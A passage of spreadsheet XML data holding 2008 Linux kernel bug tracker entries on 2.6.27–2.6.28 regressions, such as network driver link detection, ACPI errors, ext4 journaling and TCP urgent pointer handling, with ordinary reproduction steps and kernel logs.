  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: 2.6.28-rc2 Problem Description: There is no compat layer for CDROM ioctls. For whatever reason this worked anyway with &lt;= 2.6.27, at least good enough for hal to correctly handle it (it uses at least CDROM_SET_OPTIONS, CDROM_GET_CAPABILITY and CDROM_DRIVE_STATUS).</t>
  </si>
  <si>
    <t>[PATCH]sis190 doesn't detect ethernet cable removal (Realtek PHY)</t>
  </si>
  <si>
    <t>2.6.30.1</t>
  </si>
  <si>
    <t>2008-10-31 14:37 UTC</t>
  </si>
  <si>
    <t>Herton Ronaldo Krzesinski</t>
  </si>
  <si>
    <t>2012-05-22 15:09 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Earliest failing kernel version: tested with 2.6.27.2 (vanilla), it fails, also other version tested was now old 2.6.24, same issue Distribution: Mandriva Hardware Environment: Clevo M540SS Software Environment: Problem Description: For the sis190 I have here it doesn't report link change inside interrupt handler after removing ethernet cable. This makes ethernet cable detection to not work correctly. Network works fine, if you don't remove ethernet cable after first connection, keep it removed for some time, and reconnect. Steps to reproduce: - Remove ethernet cable (after booting with it plugged, or after plugging it after boot). Driver doesn't detect link change. This is shown on kernel log after sis190 module is loaded with cable connected: sis190 Gigabit Ethernet driver 1.2 loaded. sis190 0000:00:04.0: PCI INT A -&gt; GSI 19 (level, low) -&gt; IRQ 19 sis190 0000:00:04.0: setting latency timer to 64 0000:00:04.0: Read MAC address from EEPROM 0000:00:04.0: Realtek PHY RTL8201 transceiver at address 1. 0000:00:04.0: Using transceiver at address 1 as default. 0000:00:04.0: SiS 191 PCI Gigabit Ethernet adapter at f8c14000 (IRQ: 19), 00:90:f5:69:e8:8b eth0: GMII mode. eth0: Enabling Auto-negotiation. ADDRCONF(NETDEV_UP): eth0: link is not ready eth0: mii ext = 0000. eth0: mii lpa = 40a1 adv = 01e1. eth0: link on 100 Mbps Half Duplex mode. ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready eth0: no IPv6 routers present</t>
  </si>
  <si>
    <t>undefined reference to `save_stack_trace'</t>
  </si>
  <si>
    <t>2008-10-31 14:41 UTC</t>
  </si>
  <si>
    <t>2008-11-03 10:52 UTC</t>
  </si>
  <si>
    <t>Subject : alpha: undefined reference to `save_stack_trace' Submitter : Alexey Dobriyan &lt;adobriyan@gmail.com&gt; Date : 2008-10-31 16:57 References : http://marc.info/?l=linux-kernel&amp;m=122547246401190&amp;w=4 Handled-By : Al Viro &lt;viro@zeniv.linux.org.uk&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122548268920986&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ath5k gets lost with eeepc-laptop removal</t>
  </si>
  <si>
    <t>2008-10-31 14:58 UTC</t>
  </si>
  <si>
    <t>2008-12-01 15:13 UTC</t>
  </si>
  <si>
    <t>Subject : ath5k gets lost with eeepc-laptop removal Submitter : "Luiz Fernando N. Capitulino" &lt;lcapitulino@mandriva.com.br&gt; Date : 2008-10-31 13:05 References : http://marc.info/?l=linux-kernel&amp;m=122545827204957&amp;w=4 Handled-By : "Nick Kossifidis" &lt;mickflemm@gmail.com&gt; Notify-Also : Matthew Garrett &lt;mjg59@srcf.ucam.org&gt; Notify-Also : Alan Jenkins &lt;alan-jenkins@tuffmail.co.uk&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG: soft lockup - CPU#0 stuck for 61s! [section handler:9341]</t>
  </si>
  <si>
    <t>2.6.26.7/2.6.28-rc3</t>
  </si>
  <si>
    <t>2008-11-01 04:07 UTC</t>
  </si>
  <si>
    <t>alex</t>
  </si>
  <si>
    <t>2008-11-20 13:05 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.22 (works much better) Earliest failing kernel version:2.6.26.7 Distribution: Debian Lenny (amd64) Hardware Environment: Core2Duo E8300 Gigabyte EP43-DS3 Software Environment: Problem Description: Crahses under heavy load Steps to reproduce:</t>
  </si>
  <si>
    <t>ext3 __log_wait_for_space: no transactions</t>
  </si>
  <si>
    <t>2008-11-01 14:56 UTC</t>
  </si>
  <si>
    <t>2008-11-16 09:32 UTC</t>
  </si>
  <si>
    <t>Subject : ext3 __log_wait_for_space: no transactions Submitter : Meelis Roos &lt;mroos@linux.ee&gt; Date : 2008-10-30 9:49 References : http://marc.info/?l=linux-kernel&amp;m=122536026105643&amp;w=4 Handled-By : Theodore Tso &lt;tytso@mit.edu&gt; Notify-Also : Simon Arlott &lt;simon@fire.lp0.eu&gt; Notify-Also : Bartlomiej Zolnierkiewicz &lt;bzolnier@gmail.com&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Unable to handle kernel paging request at iov_iter_copy_from_user_atomic</t>
  </si>
  <si>
    <t>2008-11-02 04:23 UTC</t>
  </si>
  <si>
    <t>2008-11-02 11:37 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.28-rc2: Unable to handle kernel paging request at iov_iter_copy_from_user_atomic Submitter : "Alexander Beregalov" &lt;a.beregalov@gmail.com&gt; Date : 2008-11-01 14:23 References : http://marc.info/?l=linux-kernel&amp;m=122554945922521&amp;w=4 Handled-By : Hugh Dickins &lt;hugh@veritas.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122556602913200&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>New option for numlock: don't touch</t>
  </si>
  <si>
    <t>2008-11-02 04:38 UTC</t>
  </si>
  <si>
    <t>sergey</t>
  </si>
  <si>
    <t>2012-05-22 15:10 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 12.1 [ Excuse me for my bad English :-) ] At this time many software including kernel have 2 options for numlock state that should be applied when software loads: turn off and turn on. But this is not very comfortable in live CD's and HDD's: on most notebooks numlock should be turned off by default and on most laptops turned on (at least for me :-) ). So, what about adding the third option for boot-up numlock state: "don't touch"? In other words, just do not change numlock status, keep state that was set by BIOS/OS loader/etc?</t>
  </si>
  <si>
    <t>2.6.28-rc VC switching with Intel graphics broken</t>
  </si>
  <si>
    <t>2.6.28-rc3</t>
  </si>
  <si>
    <t>2008-11-03 12:10 UTC</t>
  </si>
  <si>
    <t>2008-12-08 13:12 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27.4 Earliest failing kernel version: 2.6.28-rc3 Distribution: Ubuntu 8.10 Intrepid Ibex Hardware Environment: Intel 945GM Chipset Software Environment: xserver-xorg-video-intel 2:2.4.1-1ubuntu10 Problem Description: X does not come back from a VC switching. Just a black screen with the cursor in it. The laptop seems to work, just screen (and keyboard) is busted. Steps to reproduce: Switch to a VC (ctrl-alt-F1). Switch back (alt-f7, f8 or whatever). You have just a black screen. No switch back to another VC. No ctrl-alt-backspace. No ctrl-alt-del. Need to reboot with SysRq-B.</t>
  </si>
  <si>
    <t>Early boot failure for 2.6.28-rc[123]: NULL pointer deref stemming from scheduler_tick</t>
  </si>
  <si>
    <t>2008-11-04 14:39 UTC</t>
  </si>
  <si>
    <t>2008-11-09 10:52 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: 2.6.28-rc1 Distribution: Ubuntu Hardy Hardware Environment: Dual Processor Pentium 4 Xeon Whitebox Software Environment: Problem Description: oops in early boot My fileserver boots under 2.6.27, but it is failing to boot on 2.6.28-rc2. It took me a while to bisect, so after I finished the bisection, I retested with the latest mainline (v2.6.28-rc3-54-g75fa677), and the problem still shows up. Essentially, the system panics in early boot, resulting in multiple oops. I finally was able get the very first oops, and the image of that oops can be found here: http://thunk.org/tytso/2.6.27-regress/92b29b8/IMG_0331.JPG From the console snapshot, it looks like two CPU simultaneously OOPS'ed with a: BUG: unable to handle kernel NULL dereference at 00000000 BUG: unable to handle kernel NULL dereference at 00000038 On the stack is "scheduler_tick+0x83/0x15f" When doing a bisection, the last good commit (i.e., the last one which I can boot on my system) is git id: d6c88a50 (which preceeds 2.6.28-rc1). The first bad git ID is: commit d6c88a507ef0b6afdb013cba4e7804ba7324d99a Author: Thomas Gleixner &lt;tglx@linutronix.de&gt; Date: Wed Oct 15 15:27:23 2008 +0200 genirq: revert dynarray Revert the dynarray changes. They need more thought and polishing. Signed-off-by: Thomas Gleixner &lt;tglx@linutronix.de&gt; ... but in fact, the failure is different from the above messages. The failure is once again in early boot, but the oops message is quite different: http://thunk.org/tytso/2.6.27-regress/b9d7ccf/IMG_0322.JPG The failure was in kmem_cache_alloc+0xab/0xc4, called by __create_workqueue_key+0x21/0x145. Walking forwards, the first git ID which shows the same failure as what shows up in 2.6.28-rc2 and 2.6.28-rc3 is git ID: 92b29b8, which apparently is a merge of the tracing-v28-for-linus branch. Because there were two failures back-to-back, it's possible either I or git bisect got confused, since normally the bisect normally doesn't terminate on a merge commit. I'll try double-checking the two ancestors of the merge commit by hand, but in the meantime I thought I'd send what I have in case it rings a bell. Again, my system is totally failing to boot since 2.6.28-rc1. This is a Aberdeen (white box) fileserver, with a SuperMicro X6DH8-XG2 motherboard, with two Pentium 4 Xeon 3.0GHz with hyperthreading.</t>
  </si>
  <si>
    <t>sysprof tracer ABI regression in 2.6.28rc1</t>
  </si>
  <si>
    <t>2.6.28rc3</t>
  </si>
  <si>
    <t>2008-11-04 22:14 UTC</t>
  </si>
  <si>
    <t>Eric Anholt</t>
  </si>
  <si>
    <t>2008-11-16 11:21 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Earliest failing kernel version: 2.6.28-rc1 Distribution: deb Hardware Environment: x86 Software Environment: Problem Description: In 777e208d40d0953efc6fb4ab58590da3f7d8f02d we changed from outputting field-&gt;cpu (a char) to iter-&gt;cpu (unsigned int), increasing the resulting structure size by 3 bytes. sysprof built for 2.6.27's sysprof tracer fails for 2.6.28 (worse than a rebuild, since ftrace doesn't give us exported headers of structures to consume!) Steps to reproduce:</t>
  </si>
  <si>
    <t>oops on reading /proc/capi/controller after removing b1isa</t>
  </si>
  <si>
    <t>2008-11-05 04:51 UTC</t>
  </si>
  <si>
    <t>2008-12-22 12:39 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Earliest failing kernel version: unknown Distribution: debian, kernel self-built Hardware Environment: x86 system with B1 ISA ISDN controller Software Environment: debian unstable Problem Description: oops on reading /proc/capi/controller after rmmod b1isa Steps to reproduce: - verify a B1 ISA is shown in /proc/capi/controller - rmmod b1isa - cat /proc/capi/controller</t>
  </si>
  <si>
    <t>JBD: grub-probe wants too many credits (266 &gt; 256)</t>
  </si>
  <si>
    <t>2008-11-06 13:34 UTC</t>
  </si>
  <si>
    <t>2008-11-09 10:47 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26 Earliest failing kernel version: 2.6.27 Reported by Joseph Fannin (I can't find this in the web archives for some reason, so I'll cut and paste the relevant pars of the report): Date: Sun, 2 Nov 2008 19:48:27 -0500 From: Joseph Fannin &lt;jfannin@gmail.com&gt; Subject: JBD2/ext4 error To: linux-ext4@vger.kernel.org Mail-Followup-To: linux-ext4@vger.kernel.org Hi, I'm hitting what's probably a bug in ext4 on one of my boxes. It always happens on the boot partition, which is extentless, since it seems likely GRUB will choke on extents. On with the backtrace, already: [ 4586.330338] JBD: grub-probe wants too many credits (266 &gt; 256) [ 4586.330384] ext4_da_writepages: jbd2_start: 18691 pages, ino 39; err -28 [ 4586.330398] Pid: 7365, comm: grub-probe Not tainted 2.6.27.4-1jhf-686 #4 [ 4586.330456] [&lt;d806a2f4&gt;] ext4_da_writepages+0x165/0x2c0 [ext4] [ 4586.330562] [&lt;d80babf2&gt;] scsi_pool_alloc_command+0x30/0x4a [scsi_mod] [ 4586.330647] [&lt;c01dd1fd&gt;] blk_rq_map_sg+0xf1/0x240 [ 4586.330671] [&lt;c01e4558&gt;] kobject_get+0xf/0x13 [ 4586.330690] [&lt;d806a18f&gt;] ext4_da_writepages+0x0/0x2c0 [ext4]</t>
  </si>
  <si>
    <t>regression introduced by - timers: fix itimer/many thread hang</t>
  </si>
  <si>
    <t>2008-11-06 15:52 UTC</t>
  </si>
  <si>
    <t>2008-11-22 23:40 UTC</t>
  </si>
  <si>
    <t>Subject : regression introduced by - timers: fix itimer/many thread hang Submitter : Doug Chapman &lt;doug.chapman@hp.com&gt; Date : 2008-11-06 11:03 References : http://marc.info/?l=linux-kernel&amp;m=122596943416648&amp;w=4 Handled-By : Frank Mayhar &lt;fmayhar@google.com&gt; Handled-By : Peter Zijlstra &lt;peterz@infradead.org&gt; Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>IRQ smp_affinities not respected</t>
  </si>
  <si>
    <t>2008-11-06 16:02 UTC</t>
  </si>
  <si>
    <t>2008-11-10 10:41 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] linux-2.6.28-rc3 regression: IRQ smp_affinities not respected Submitter : Eric Dumazet &lt;dada1@cosmosbay.com&gt; Date : 2008-11-05 6:33 References : http://marc.info/?l=linux-kernel&amp;m=122586683804881&amp;w=4 Handled-By : "Michael Chan" &lt;mchan@broadcom.com&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>gettimeofday return a old time in mmbench</t>
  </si>
  <si>
    <t>2008-11-06 23:57 UTC</t>
  </si>
  <si>
    <t>2008-12-07 12:25 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.27 Earliest failing kernel version:2.6.28-rc1 Distribution: RHEL 4.92 Hardware Environment: Intel Bensley/Clovertown Software Environment: RHEL 4.92 Problem Description: gettimeofday return a old time in mmbench Steps to reproduce: 1, set "mem=1G" in kernel cmdline 2, compile mmbench as gcc -o mmbench -lm -g mmbench.c 3, run cmd #mmbench for a while. or run mmbench in GDB directly. sometime, mmbench get a segmentation fault. and GDB report : (gdb) r Starting program: /bm/tmp/benchmarks/run_bmmmbench/mmbench/mmbench Program received signal SIGSEGV, Segmentation fault. 0x0000000000401925 in main (argc=1, argv=0x7fff0b3d1cf8) at mmbench.c:410 410 accs_num[diff_gran]++; // access time distribution (gdb) p diff_gran $2 = -42890 according to mmbench.c, the diff_gran is equal to (gettimeofday(current time) - gettimeofday(start time)) So, the negative value of diff_gran means gettimeofday get a old time. I also write a gettimeofday checking program gtod.c . but this simple program can not reproduce this issue.</t>
  </si>
  <si>
    <t>[net/mac80211/debugfs_sta.c:202]: Buffer overrun</t>
  </si>
  <si>
    <t>2008-11-07 10:33 UTC</t>
  </si>
  <si>
    <t>2008-11-11 11:06 UTC</t>
  </si>
  <si>
    <t>There is a buffer overrun.. char state[4]; memset(buf, 0x00, sizeof(buf)); buf_size = min(count, (sizeof(buf)-1)); if (copy_from_user(buf, user_buf, buf_size)) return -EFAULT; tid_num = simple_strtoul(buf, &amp;endp, 0); if (endp == buf) return -EINVAL; if ((tid_num &gt;= 100) &amp;&amp; (tid_num &lt;= 115)) { /* toggle Rx aggregation command */ tid_num = tid_num - 100; if (tid_static_rx[tid_num] == 1) { strcpy(state, "off "); The trailing zero will be written to state[4] which is out of bounds.</t>
  </si>
  <si>
    <t>2.6.26.6 breaks resume on my ThinkPad x60s</t>
  </si>
  <si>
    <t>2008-11-07 16:56 UTC</t>
  </si>
  <si>
    <t>Olivier Crête</t>
  </si>
  <si>
    <t>2012-05-14 16:42 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26.5 ( Earliest failing kernel version: 2.6.26.6 Distribution: Gentoo Hardware Environment: ThinkPad x60s Software Environment: ? Problem Description: Fails to resume It locks up on resume before restarting X. It did a bisect, and it stops working after patch commit 7f0a673a75d3f9f50a64f83055b71be67526efd7 Author: Thomas Gleixner &lt;tglx@linutronix.de&gt; Date: Wed Sep 3 21:37:08 2008 +0000 clockevents: prevent multiple init/shutdown Steps to reproduce: Suspend to ram + resume</t>
  </si>
  <si>
    <t>nommu_map_single overflows, various hardware stopped working</t>
  </si>
  <si>
    <t>2.6.27.5</t>
  </si>
  <si>
    <t>2008-11-08 09:59 UTC</t>
  </si>
  <si>
    <t>2008-11-18 12:46 UTC</t>
  </si>
  <si>
    <t>Joerg Roedel</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26.7 Earliest failing kernel version: 2.6.27 Distribution: none, home made kernel for embedded system Hardware Environment: http://pld.pastebin.com/f49968fce Problem Description: Various hardware doesn't work under x86_64 kernel with 4 or more gigs of RAM. For every non working hardware nommu_map_single overflows appears in dmesg. Adding mem=2G to kernel options fixes the problem. I've checked few older kernels (2.6.24.x, 2.6.25.x, 2.6.26.x) and they work properly. Steps to reproduce: boot x86_64 version of any 2.6.27 kernel on machine with 4 or more gigs of RAM and load ie. uhci-hcd module. Here is dmesg output of freshly booted kernel before loading any modules: http://pld.pastebin.com/f5c9dfca3 That appears in dmesg after loading usb drivers (ehci, uhci, usbhid with connected usb keyboard): http://pld.pastebin.com/f744eb332 That appears in dmesg after loading 3c59x module: http://pld.pastebin.com/m6f703dfc Interface eth0 is visible, but NIC doesn't work at all.</t>
  </si>
  <si>
    <t>Fan level 7 after resume wit 2.6.28-rc3</t>
  </si>
  <si>
    <t>2008-11-08 14:36 UTC</t>
  </si>
  <si>
    <t>2010-10-08 18:20 UTC</t>
  </si>
  <si>
    <t>Subject : Fan level 7 after resume wit 2.6.28-rc3 Submitter : Tino Keitel &lt;tino.keitel@tikei.de&gt; Date : 2008-11-05 7:33 References : http://marc.info/?l=linux-kernel&amp;m=122587043409186&amp;w=4 Handled-By : Henrique de Moraes Holschuh &lt;hmh@hmh.eng.br&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>iwlagn: wrong command queue 31, command id 0x0</t>
  </si>
  <si>
    <t>2008-11-08 15:13 UTC</t>
  </si>
  <si>
    <t>2008-12-11 11:13 UTC</t>
  </si>
  <si>
    <t>Subject : iwlagn: wrong command queue 31, command id 0x0 Submitter : Matt Mackall &lt;mpm@selenic.com&gt; Date : 2008-11-06 4:16 References : http://marc.info/?l=linux-kernel&amp;m=122598672815803&amp;w=4 References : http://www.intellinuxwireless.org/bugzilla/show_bug.cgi?id=1703 Handled-By : reinette chatre &lt;reinette.chatre@intel.com&gt; Notify-Also : Marcel Holtmann &lt;marcel@holtmann.org&gt; Notify-Also : "Luis R. Rodriguez" &lt;mcgrof@gmail.com&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.28-rc3 truncates nfsd results</t>
  </si>
  <si>
    <t>2008-11-08 15:33 UTC</t>
  </si>
  <si>
    <t>2008-11-09 13:44 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.28-rc3 truncates nfsd results Submitter : "Doug Nazar" &lt;nazard@dragoninc.ca&gt; Date : 2008-11-04 18:27 References : http://marc.info/?l=linux-kernel&amp;m=122582366509153&amp;w=4 Notify-Also : Jeff Garzik &lt;jeff@garzik.org&gt; Handled-By : Doug Nazar &lt;nazard@dragoninc.ca&gt; Handled-By : "J. Bruce Fields" &lt;bfields@fieldses.org&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122592648119790&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Eliminate recursive mutex in compat fb ioctl path</t>
  </si>
  <si>
    <t>2008-11-08 16:08 UTC</t>
  </si>
  <si>
    <t>2008-11-15 03:43 UTC</t>
  </si>
  <si>
    <t>Subject : Eliminate recursive mutex in compat fb ioctl path Submitter : Keith Packard &lt;keithp@keithp.com&gt; Date : 2008-11-03 7:06 References : http://marc.info/?l=linux-kernel&amp;m=122569604828448&amp;w=4 Handled-By : Keith Packard &lt;keithp@keithp.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122569604828448&amp;w=4 Handled-By : Geert Uytterhoeven &lt;Geert.Uytterhoeven@sonycom.com&gt; Patch : http://lkml.org/lkml/2008/10/31/162 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Suspend failure on NForce4-based boards due to chanes in stop_machine</t>
  </si>
  <si>
    <t>commit c9583e55fa2b08a230c549bd1e3c0bde6c50d9cc</t>
  </si>
  <si>
    <t>2008-11-08 16:20 UTC</t>
  </si>
  <si>
    <t>2008-11-17 11:39 UTC</t>
  </si>
  <si>
    <t>Heiko Carstens</t>
  </si>
  <si>
    <t>Subject : Suspend failure on NForce4-based boards due to chanes in stop_machine Submitter : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Date : 2008-11-03 0:28 References : http://marc.info/?l=linux-kernel&amp;m=122567187604356&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>SMP boot crash if C-states enabled - LG E500 V.APSCG</t>
  </si>
  <si>
    <t>2.6.24, 2.6.27, 2.6.28, 2.6.29</t>
  </si>
  <si>
    <t>2008-11-09 00:10 UTC</t>
  </si>
  <si>
    <t>Pascal Häußler</t>
  </si>
  <si>
    <t>2009-12-22 02:57 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: 2.6.24 Distribution: Ubuntu 8.04 / 8.10 64 bit and 32 bit Hardware Environment: Laptop LG E500 V.APSCG, Intel Core2Duo T8100 @2.1GHz, 2GB RAM, ATI Mobility Radeon Software Environment: Curently Ubuntu 8.10 "Intrepid" 64 bit (same problem with other Distributions and also with 32 bit) Problem Description: The boot process crashes in a very early stage (before the root file system is mounted). I figured out that the problem vanishes as soon as I compile a kernel with the ACPI_PROCESSOR option turned off. Further more, the systems boot also with ACPI_PROCESSOR enabled as soon as I turn off dual core support in the AMI BIOS i.e. boot on a single core. I tried to fix a DSDT table issue by using iasl. Nevertheless this does not help. I am not sure if it is a pure kernel problem or a mixed kernel/DSDT or SSDT table problem. Since the crash occurs that early I cannot provide much helpful information. I could send you a photo of the screen in crashed state and of course also the complete ACPI table infos extracted with acpidump. Steps to reproduce: Take an LG E500 V.APSCG and simpliy insert a life CD of Ubuntu 8.04/8.10 - or an other distribution. Note: I did not try older distributions. The oldest kernel I tries was 2.6.24</t>
  </si>
  <si>
    <t>Computer doesn't power down after commit ACPI: EC: do transaction from interrupt context</t>
  </si>
  <si>
    <t>2008-11-09 02:02 UTC</t>
  </si>
  <si>
    <t>2008-11-15 05:37 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27.4 Earliest failing kernel version: 2.6.27.5 Distribution: Gentoo Hardware Environment: ACER Travelmate 4001 Lmi Software Environment: Problem Description: Steps to reproduce: try to power down the computer I can't more power down my computer correctly since commit 5ceb40417bca2045350e77f740e0c4c94875fff2 (ACPI: EC: do transaction from interrupt context) has been merged in the stable kernel. I did a bisection run between 2.6.27.4 and 2.6.27.5 and it show up as the first bad commit. If I revert all EC related commit between these 2 kernels, the problem doesn't occur. This commit also flood dmesg with lines like "ACPI: EC: non-query interrupt received, switching to interrupt mode" (see bug #11841) but it is solved by the patched proposed in this bug report.</t>
  </si>
  <si>
    <t>Tracing framework regression in 2.6.28-rc3</t>
  </si>
  <si>
    <t>2008-11-09 11:38 UTC</t>
  </si>
  <si>
    <t>2008-11-23 05:15 UTC</t>
  </si>
  <si>
    <t>Steven Rostedt</t>
  </si>
  <si>
    <t>Subject : Tracing framework regression in 2.6.28-rc3 Submitter : Pekka Paalanen &lt;pq@iki.fi&gt; Date : 2008-11-09 10:13 References : http://marc.info/?l=linux-kernel&amp;m=122624392229317&amp;w=4 Handled-By : Steven Rostedt &lt;rostedt@goodmis.org&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>gspca does not recognize supported camera 0471:0328</t>
  </si>
  <si>
    <t>2008-11-09 12:46 UTC</t>
  </si>
  <si>
    <t>Andrej</t>
  </si>
  <si>
    <t>2008-11-10 00:04 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26 Earliest failing kernel version: 2.6.27 Distribution: Ubuntu Intrepid Hardware Environment: USB webcam Philips SPC 700 NC Software Environment: Problem Description: gspca_sonixj doesn't recognize this camera, which doesn't work fine with the driver sn9c102. With the driver sonixj works fine even with skype and cheese, with camorama doesn't Steps to reproduce: The same as in bug #11920 with another camera: PHILIPS SPC 700 NC. (0471:0328), with kernel 2.6.27 on ubuntu and on archlinux. With gspca module on debian kernel 2.6.26 works fine. I have solved with the same method as in bug #11920 and as here: http://linuxtv.org/hg/~jfrancois/gspca/rev/09c8fa13bcff I remove the line {USB_DEVICE(0x0471, 0x0328), BSI(SN9C105, MI0360, 0x5d)}, in sonixj.c from the construct #if !defined CONFIG_USB_SN9C102 &amp;&amp; !defined CONFIG_USB_SN9C102_MODULE ... #endif With the module sn9c102 sometimes don't recognise the image sensor and when it does, don't work fine. Thanks</t>
  </si>
  <si>
    <t>ACPI: EC: missing confirmations, switch off interrupt mode.</t>
  </si>
  <si>
    <t>2008-11-10 01:06 UTC</t>
  </si>
  <si>
    <t>2009-03-15 21:08 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown - seen for the first time Earliest failing kernel version: unknown - seen for the first time Distribution: Debian testing Hardware Environment: Asus EEE901, BIOS 1702 Software Environment: vanilla 2.6.27+rt2860+Debian testing Problem Description: ACPI: EC: missing confirmations, switch off interrupt mode. ACPI Exception (evregion-0419): AE_TIME, Returned by Handler for [EmbeddedControl] [20080609] ACPI Error (psparse-0530): Method parse/execution failed [\_SB_.PCI0.SBRG.EC0_.BST1] (Node f7814e40), AE_TIME ACPI Error (psparse-0530): Method parse/execution failed [\_SB_.PCI0.CBST] (Node f7817030), AE_TIME ACPI Error (psparse-0530): Method parse/execution failed [\_SB_.PCI0.BAT0._BST] (Node f7815f60), AE_TIME ACPI Exception (battery-0360): AE_TIME, Evaluating _BST [20080609] Steps to reproduce: just seen in dmesg - unknown reproduction</t>
  </si>
  <si>
    <t>ACPI Error Method parse/execution failed with kernel 2.6.27.5</t>
  </si>
  <si>
    <t>2008-11-10 10:08 UTC</t>
  </si>
  <si>
    <t>2008-11-12 21:28 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27.4 Earliest failing kernel version: 2.6.27.5 Distribution: Gentoo 64 bits Hardware Environment: Packard Bell Easynote MB86, Intel Core 2 Duo Software Environment: Problem Description: With kernel 2.6.27.5, I see frequently the following error in dmesg: ACPI Exception (evregion-0419): AE_TIME, Returned by Handler for [EmbeddedControl] [20080609] ACPI Error (psparse-0530): Method parse/execution failed [\_SB_.BAT1.UPBS] (Node ffff8800bf0139e0), AE_TIME ACPI Error (psparse-0530): Method parse/execution failed [\_SB_.BAT1._BST] (Node ffff8800bf0139a0), AE_TIME ACPI Exception (battery-0360): AE_TIME, Evaluating _BST [20080609] As far as I can search, this problem didn't occur with earlier kernel versions. I have looked in the logs and I can't find such errors before having upgraded to the latest kernel. Steps to reproduce:</t>
  </si>
  <si>
    <t>Incorrect Urgent Pointer in outgoing packets</t>
  </si>
  <si>
    <t>2008-11-12 02:16 UTC</t>
  </si>
  <si>
    <t>2012-05-16 14:55 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: ??? (maybe never) Earliest failing kernel version: 2.6.27 Distribution: kernel.org Hardware Environment: x86, x86_64 Software Environment: Oracle, testcase Problem Description: When urgent mode is initiated using send(..., MSG_OOB), and the current outgoing queue is longer than MTU, several packets are sent out with the URG flag set. However, the Urgent Pointer field in the TCP header is not updated correctly. Instead, it stays the same. The receiving end interprets this as a new urgent message inserted further in the stream, sends multiple SIGURGs to the server application and reads across the urgent data. This behaviour is correct. Steps to reproduce: 1. Initiate a TCP connection 2. Fill the outgoing queue with some (normal) data 3. Send an urgent message (with MSG_OOB) 4. Send some more non-urgent data.</t>
  </si>
  <si>
    <t>oops when using ext4 on soft raid on IA64 with 65536 block size</t>
  </si>
  <si>
    <t>2.6.28-rc3-git4</t>
  </si>
  <si>
    <t>2008-11-13 00:06 UTC</t>
  </si>
  <si>
    <t>Li Zefan</t>
  </si>
  <si>
    <t>2009-01-17 18:25 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: ? Failing kernel version: 2.6.28-rc3-git4 Distribution: Fedora Hardware Environment: four 881.0GB hard disks Software Environment: latest-git e2fsprogs Problem Description and Steps to reproduce: I used soft raid on IA64 and got the following oops. # fdisk -l Disk /dev/sdc: 881.0 GB, 881005166592 bytes 255 heads, 63 sectors/track, 107109 cylinders Units = cylinders of 16065 * 512 = 8225280 bytes Disk identifier: 0x0000544c Device Boot Start End Blocks Id System /dev/sdc1 1 107109 860353011 fd Linux raid autodetect ... Device Boot Start End Blocks Id System /dev/sdd1 1 107109 860353011 fd Linux raid autodetect ... Device Boot Start End Blocks Id System /dev/sde1 1 107109 860353011 fd Linux raid autodetect ... Device Boot Start End Blocks Id System /dev/sdf1 1 107109 860353011 fd Linux raid autodetect # mdadm --create /dev/md0 --level=0 --raid-devices=4 /dev/sdc1 /dev/sdd1 /dev/sde1 /dev/sdf1 # mkfs.ext4 -b 65536 /dev/md0 # mount -t ext4 /dev/md0 /mnt # cd /mnt # dd if=/dev/zero of=tmp_file bs=1M count=700 (stuck) (another console) EXT4-fs: barriers enabled kjournald2 starting. Commit interval 5 seconds EXT4 FS on md0, internal journal on md0:8 EXT4-fs: delayed allocation enabled EXT4-fs: file extents enabled EXT4-fs: mballoc enabled EXT4-fs: mounted filesystem 